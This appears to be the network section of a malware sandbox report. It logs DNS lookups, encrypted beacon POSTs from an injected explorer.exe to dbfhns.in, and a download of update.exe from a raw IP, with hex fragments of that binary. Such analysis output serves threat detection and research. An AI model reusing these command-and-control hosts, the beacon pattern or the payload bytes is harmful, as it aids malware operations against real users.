                                                            May 27, 2024 15:27:01.657985926 CEST8053132190.147.128.172192.168.2.8
                                                            May 27, 2024 15:27:01.666512966 CEST8053132190.147.128.172192.168.2.8
                                                            May 27, 2024 15:27:01.666771889 CEST5313280192.168.2.8190.147.128.172
                                                            May 27, 2024 15:27:01.666771889 CEST5313280192.168.2.8190.147.128.172
                                                            May 27, 2024 15:27:01.674902916 CEST8053132190.147.128.172192.168.2.8
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                            May 27, 2024 15:23:37.975954056 CEST1.1.1.1192.168.2.80xfeb0No error (0)dbfhns.in189.163.126.89A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:37.975954056 CEST1.1.1.1192.168.2.80xfeb0No error (0)dbfhns.in187.170.192.109A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:37.975954056 CEST1.1.1.1192.168.2.80xfeb0No error (0)dbfhns.in190.147.128.172A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:37.975954056 CEST1.1.1.1192.168.2.80xfeb0No error (0)dbfhns.in194.93.26.201A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:37.975954056 CEST1.1.1.1192.168.2.80xfeb0No error (0)dbfhns.in187.143.58.5A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:37.975954056 CEST1.1.1.1192.168.2.80xfeb0No error (0)dbfhns.in211.171.233.129A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:24:10.009982109 CEST1.1.1.1192.168.2.80x6ac8No error (0)steamcommunity.com104.102.42.29A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:26:13.276562929 CEST1.1.1.1192.168.2.80xec1dNo error (0)dbfhns.in190.147.128.172A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:26:13.276562929 CEST1.1.1.1192.168.2.80xec1dNo error (0)dbfhns.in194.93.26.201A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:26:13.276562929 CEST1.1.1.1192.168.2.80xec1dNo error (0)dbfhns.in187.143.58.5A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:26:13.276562929 CEST1.1.1.1192.168.2.80xec1dNo error (0)dbfhns.in211.171.233.129A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:26:13.276562929 CEST1.1.1.1192.168.2.80xec1dNo error (0)dbfhns.in109.175.29.39A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:26:13.276562929 CEST1.1.1.1192.168.2.80xec1dNo error (0)dbfhns.in189.245.6.57A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:26:13.276562929 CEST1.1.1.1192.168.2.80xec1dNo error (0)dbfhns.in190.13.174.94A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:26:13.276562929 CEST1.1.1.1192.168.2.80xec1dNo error (0)dbfhns.in181.123.219.23A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:26:13.276562929 CEST1.1.1.1192.168.2.80xec1dNo error (0)dbfhns.in189.163.126.89A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:26:13.276562929 CEST1.1.1.1192.168.2.80xec1dNo error (0)dbfhns.in187.170.192.109A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:26:13.276607037 CEST1.1.1.1192.168.2.80xec1dNo error (0)dbfhns.in190.147.128.172A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:26:13.276607037 CEST1.1.1.1192.168.2.80xec1dNo error (0)dbfhns.in194.93.26.201A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:26:13.276607037 CEST1.1.1.1192.168.2.80xec1dNo error (0)dbfhns.in187.143.58.5A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:26:13.276607037 CEST1.1.1.1192.168.2.80xec1dNo error (0)dbfhns.in211.171.233.129A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:26:13.276607037 CEST1.1.1.1192.168.2.80xec1dNo error (0)dbfhns.in109.175.29.39A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:26:13.276607037 CEST1.1.1.1192.168.2.80xec1dNo error (0)dbfhns.in189.245.6.57A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:26:13.276607037 CEST1.1.1.1192.168.2.80xec1dNo error (0)dbfhns.in190.13.174.94A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:26:13.276607037 CEST1.1.1.1192.168.2.80xec1dNo error (0)dbfhns.in181.123.219.23A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:26:13.276607037 CEST1.1.1.1192.168.2.80xec1dNo error (0)dbfhns.in189.163.126.89A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:26:13.276607037 CEST1.1.1.1192.168.2.80xec1dNo error (0)dbfhns.in187.170.192.109A (IP address)IN (0x0001)false
                                                            • whispedwoodmoodsksl.shop
                                                            • steamcommunity.com
                                                            • 37.27.34.12
                                                            • spqqefesecvvfpt.net
                                                              • dbfhns.in
                                                            • dxgcikcstvjhw.org
                                                            • deiljvysjqajyam.com
                                                            • tgeabjhcrwocia.org
                                                            • hfipxhiwprpsvl.net
                                                            • mdyttvvsjifyxv.com
                                                            • 45.129.96.86
                                                            • faqldvcxoayalcyp.com
                                                            • nspuoowkrfsuk.com
                                                            • gcvwrsnytusejtdk.com
                                                            • jebcasiwwjgorbsq.net
                                                            • 23.145.40.124
                                                            • 185.235.137.54
                                                            • bshlmattfttfdb.com
                                                            • bngikvknmtdpor.org
                                                            • 91.202.233.231
                                                            • amkihwobrgvem.org
                                                            • bdtrshdmdsajiin.net
                                                            • depvhlbmmte.com
                                                            • barvntqgmwgcruw.net
                                                            • cmmajutpfcykk.com
                                                            • jrlquvadpwx.org
                                                            • lmlmhdjgxcsr.com
                                                            • dhyltqofxhpe.net
                                                            • nxoumlltphj.com
                                                            • etetxpvheghmlur.net
                                                            • spdxbqopubx.org
                                                            • pxinixbdcjjccvdo.com
                                                            • euirtythbemo.net
                                                            • btndjessgdxlt.net
                                                            • nfymgppnbopwxnwd.net
                                                            • ckgltynaavllsolq.com
                                                            • hbtkypdfbiu.net
                                                            • haglmiwlgvefe.net
                                                            • dnvpkenpnlmca.org
                                                            • qvgxhyimdjdqth.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49708 | 190.13.174.94 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 15:23:26.259476900 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://spqqefesecvvfpt.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 286
                                                            Host: dbfhns.in
May 27, 2024 15:23:26.259500980 CEST | 286 | OUT | Data Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3c 19 b3 88
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA .[k,vu<KPS<lE5QA=rM*:B/5OQYwkWM_\%/|'&27aLjru7cJP%@H3
May 27, 2024 15:23:27.605427980 CEST | 152 | IN | HTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:23:27 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 04 00 00 00 72 e8 85 ed
                                                            Data Ascii: r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49709 | 190.13.174.94 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 15:23:27.616899014 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://dxgcikcstvjhw.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 141
                                                            Host: dbfhns.in
May 27, 2024 15:23:27.616920948 CEST | 141 | OUT | Data Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 65 2d a8 8c
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA -[k,vue-RQZ_kNSDrrdH&V#/FF_S3
May 27, 2024 15:23:28.913645029 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:23:28 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49710 | 190.13.174.94 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 15:23:28.922755003 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://deiljvysjqajyam.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 270
                                                            Host: dbfhns.in
May 27, 2024 15:23:28.922775984 CEST | 270 | OUT | Data Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 73 4c ce 82
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA -[k,vusLg/nfZYV2NM'76{I9Lc{0!}| #0nro\_]m'YmA%JrVPGcQk<4q
May 27, 2024 15:23:30.206592083 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:23:29 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49711 | 190.13.174.94 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 15:23:30.215168953 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://tgeabjhcrwocia.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 135
                                                            Host: dbfhns.in
May 27, 2024 15:23:30.215184927 CEST | 135 | OUT | Data Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 20 1c d1 ff
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA -[k,vu L>rr$+h8GRT5z$
May 27, 2024 15:23:31.516701937 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:23:31 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49712 | 190.13.174.94 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 15:23:31.525949001 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://hfipxhiwprpsvl.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 163
                                                            Host: dbfhns.in
May 27, 2024 15:23:31.525976896 CEST | 163 | OUT | Data Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 50 1e a5 be
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA -[k,vuP4fek;1d=3xVuFIWE=WXQRM^Ei
May 27, 2024 15:23:32.806087971 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:23:32 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 53061 | 190.13.174.94 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 15:23:33.065018892 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://mdyttvvsjifyxv.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 175
                                                            Host: dbfhns.in
May 27, 2024 15:23:33.065018892 CEST | 175 | OUT | Data Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 6e 23 ff e7
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA -[k,vun#wAQKv4l\`z47R@\Y&7a~W-/!oRzWE*
May 27, 2024 15:23:34.366200924 CEST | 191 | IN | HTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:23:34 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2d 5e 24 17 a6 61 44 a2 ae 09 ab c8 ad ac 2b 98 2b 9a ed 33 5e 14 98 8f c1 cb 7c d1
                                                            Data Ascii: #\-^$aD++3^|


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.8 | 53064 | 45.129.96.86 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 15:23:34.376410007 CEST | 165 | OUT | GET /file/update.exe HTTP/1.1
                                                            Connection: Keep-Alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Host: 45.129.96.86
May 27, 2024 15:23:35.048965931 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                            Server: nginx/1.22.1
                                                            Date: Mon, 27 May 2024 13:23:34 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 325120
                                                            Last-Modified: Mon, 27 May 2024 13:20:02 GMT
                                                            Connection: keep-alive
                                                            ETag: "66548882-4f600"
                                                            Accept-Ranges: bytes
                                                            May 27, 2024 15:23:35.049119949 CEST1236INData Raw: 56 e8 d4 00 00 00 eb 2b 80 7d 0c 00 74 19 83 fe 10 73 14 8b 47 10 8b cf 3b f0 0f 42 c6 50 6a 01 e8 2f fe ff ff eb 0c 85 f6 75 08 56 8b cf e8 87 ff ff ff 33 c0 3b c6 5f 1b c0 f7 d8 5e 5d c2 08 00 8b cf e8 31 00 00 00 cc 55 8b ec 83 7d 08 00 57 8b
                                                            Data Ascii: V+}tsG;BPj/uV3;_^]1U}WtI9Er=G;Ev2_]hxAhxAU]faayrUQEPN3B;HF]ASVuWe
                                                            May 27, 2024 15:23:35.049151897 CEST1236INData Raw: f9 80 00 00 00 0f 82 ce 01 00 00 8b c7 33 c6 a9 0f 00 00 00 75 0e 0f ba 25 18 90 41 00 01 0f 82 da 04 00 00 0f ba 25 30 5e 44 00 00 0f 83 a7 01 00 00 f7 c7 03 00 00 00 0f 85 b8 01 00 00 f7 c6 03 00 00 00 0f 85 97 01 00 00 0f ba e7 02 73 0d 8b 06
                                                            Data Ascii: 3u%A%0^Dsvs~vftcfoNvfo^0foF fon0v00fof:ffof:fGfof:fo 0}vfoNvIfo^0f
                                                            May 27, 2024 15:23:35.049186945 CEST1236INData Raw: 47 02 8b 44 24 0c 5e 5f c3 90 8a 46 03 88 47 03 8a 46 02 88 47 02 8a 46 01 88 47 01 8b 44 24 0c 5e 5f c3 8d a4 24 00 00 00 00 57 8b c6 83 e0 0f 85 c0 0f 85 d2 00 00 00 8b d1 83 e1 7f c1 ea 07 74 65 8d a4 24 00 00 00 00 90 66 0f 6f 06 66 0f 6f 4e
                                                            Data Ascii: GD$^_FGFGFGD$^_$Wte$fofoNfoV fo^0ffOfW f_0fof@fonPfov`fo~pfg@foPfw`fpJutOtfofvJut*tvIutFGIu
                                                            May 27, 2024 15:23:35.049218893 CEST1000INData Raw: 8f f0 8b 44 8e f4 89 44 8f f4 8b 44 8e f8 89 44 8f f8 8b 44 8e fc 89 44 8f fc 8d 04 8d 00 00 00 00 03 f0 03 f8 ff 24 95 f8 2c 40 00 8b ff 08 2d 40 00 10 2d 40 00 1c 2d 40 00 30 2d 40 00 8b 44 24 0c 5e 5f c3 90 8a 06 88 07 8b 44 24 0c 5e 5f c3 90
                                                            Data Ascii: DDDDDD$,@-@-@-@0-@D$^_D$^_FGD$^_IFGFGD$^_t1|9u$r$.@$D.@Ir+$-@$.@-@-@-@F#Gr
                                                            May 27, 2024 15:23:35.049251080 CEST1236INData Raw: 54 24 0c 8b d4 83 c2 14 89 54 24 08 89 54 24 04 89 14 24 e8 c3 18 00 00 83 c4 10 dd 44 24 04 c3 f3 0f 7e 44 24 04 66 0f f3 ca 66 0f 28 d8 66 0f c2 c1 06 3d ff 03 00 00 7c 25 3d 32 04 00 00 7f b0 66 0f 54 05 10 30 41 00 f2 0f 58 c8 66 0f d6 4c 24
                                                            Data Ascii: T$T$T$$D$~D$ff(f=|%=2fT0AXfL$D$P0Af00AfT0Af\$D$UQeEVPuuu9EttM^]L$t$tNu$$
                                                            May 27, 2024 15:23:35.049288034 CEST1236INData Raw: 00 0f 84 aa 23 00 00 83 ec 08 0f ae 5c 24 04 8b 44 24 04 25 80 7f 00 00 3d 80 1f 00 00 75 0f d9 3c 24 66 8b 04 24 66 83 e0 7f 66 83 f8 7f 8d 64 24 08 0f 85 79 23 00 00 eb 00 f3 0f 7e 44 24 04 66 0f 28 15 70 30 41 00 66 0f 28 c8 66 0f 28 f8 66 0f
                                                            Data Ascii: #\$D$%=u<$f$ffd$y#~D$f(p0Af(f(fs4f~fT0AffuL=|}f=2fL$D$f.{$T$T$T$$SD$~D$ff(f=|!=2fT`0A\fL$D$
                                                            May 27, 2024 15:23:35.054821014 CEST1236INData Raw: 74 02 ff d1 83 c6 04 3b 75 0c 72 ec 5e 5d c3 6a 08 e8 ed 31 00 00 59 c3 6a 08 e8 4e 33 00 00 59 c3 6a 1c 68 e8 7e 41 00 e8 59 14 00 00 6a 08 e8 cf 31 00 00 59 83 65 fc 00 83 3d ec 5d 44 00 01 0f 84 c9 00 00 00 c7 05 14 5e 44 00 01 00 00 00 8a 45
                                                            Data Ascii: t;ur^]j1YjN3Yjh~AYj1Ye=]D^DE^D}5H5| A]tt5H]}}};rWjx A9t;rG7jx A5H5| AE5HM9Mu9EtM]Eh!Ah


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            7           192.168.2.8  53069        109.175.29.39   80                4084  C:\Windows\explorer.exe
                                                            Timestamp                             Bytes transferred  Direction  Data
                                                            May 27, 2024 15:23:37.979177952 CEST  283                OUT        POST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://faqldvcxoayalcyp.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 169
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:23:37.979198933 CEST  169                OUT        Data Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2c 5b 0e 6b 2c 90 f4 76 0b 75 44 5e df 88
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA ,[k,vuD^,_uWxb,VP}`X+N`OE1,o^#T+hF
                                                            May 27, 2024 15:23:38.782134056 CEST  484                IN         HTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:23:38 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            8           192.168.2.8  53070        109.175.29.39   80                4084  C:\Windows\explorer.exe
                                                            Timestamp                             Bytes transferred  Direction  Data
                                                            May 27, 2024 15:23:38.823920965 CEST  280                OUT        POST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://nspuoowkrfsuk.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 187
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:23:38.823932886 CEST  187                OUT        Data Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 5e 41 b5 9b
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA -[k,vu^A|;E^sR@8/{QaHD]u?WDg.%Cn5)/rd6z'M,3
                                                            May 27, 2024 15:23:39.621417046 CEST  484                IN         HTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:23:39 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            9           192.168.2.8  53072        109.175.29.39   80                4084  C:\Windows\explorer.exe
                                                            Timestamp                             Bytes transferred  Direction  Data
                                                            May 27, 2024 15:23:39.639947891 CEST  283                OUT        POST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://gcvwrsnytusejtdk.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 334
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:23:39.639947891 CEST  334                OUT        Data Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 40 22 a7 b6
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA -[k,vu@"&FvIJQ/5%bf[rcTGS&I$QH+u[P'&d4\f"&z"XXh&vnbsNEbmhp:C&e
                                                            May 27, 2024 15:23:40.475568056 CEST  484                IN         HTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:23:40 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            10          192.168.2.8  53073        109.175.29.39   80                4084  C:\Windows\explorer.exe
                                                            Timestamp                             Bytes transferred  Direction  Data
                                                            May 27, 2024 15:23:40.496459961 CEST  283                OUT        POST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://jebcasiwwjgorbsq.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 133
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:23:40.496459961 CEST  133                OUT        Data Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 23 1e b4 93
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA -[k,vu#Ocu{PL#w+k+j#T2J
                                                            May 27, 2024 15:23:41.478162050 CEST  190                IN         HTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:23:41 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2b 58 24 17 a0 6d 44 af a8 09 a2 cc b6 e5 32 9d 20 c1 e0 2a 0b 19 9a c4 8a d6 61
                                                            Data Ascii: #\+X$mD2 *a


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
